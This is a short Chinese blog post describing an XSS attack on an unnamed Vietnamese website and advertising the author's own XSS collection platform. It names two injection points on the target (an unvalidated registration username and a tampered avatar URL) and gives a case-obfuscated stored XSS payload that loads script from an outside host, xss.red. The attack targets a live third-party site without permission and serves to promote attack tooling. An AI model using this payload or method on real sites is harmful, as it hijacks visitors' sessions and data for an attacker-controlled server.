记一次通过 XSS 漏洞渗透越南站

很久没更新博客了呢，突然发现不知道从啥时候开始，本站的 XSS 平台也没有了新用户注册了； 于是有了今天这篇科普文，来给大家秀下本站的 XSS 平台呢~[aru_3][aru_3]

开局一张图。。。 我也不知道这是个啥站，一堆鸟文看不懂，不过不影响咱们插他。 有2个地方可以插，一个是会员注册，不懂为什么对用户名没有进行格式验证： 第二个地方是注册登录后，用户信息修改-头像修改处，不能自定义头像，但是可以选择自带的一些头像，因此通过抓包修改图片的地址即可： payload:

"><sCRiPt/SrC=//xss.red/b>

接下来到了本文的重要环节了，本站的 XSS 平台广告时间~[aru_17][aru_17] 是不是简洁方便易看易操作？[aru_13][aru_13] 模块我就不秀了，没啥好看的，支持自定义模块，所以想要啥模块自己添加就行了。都一个样~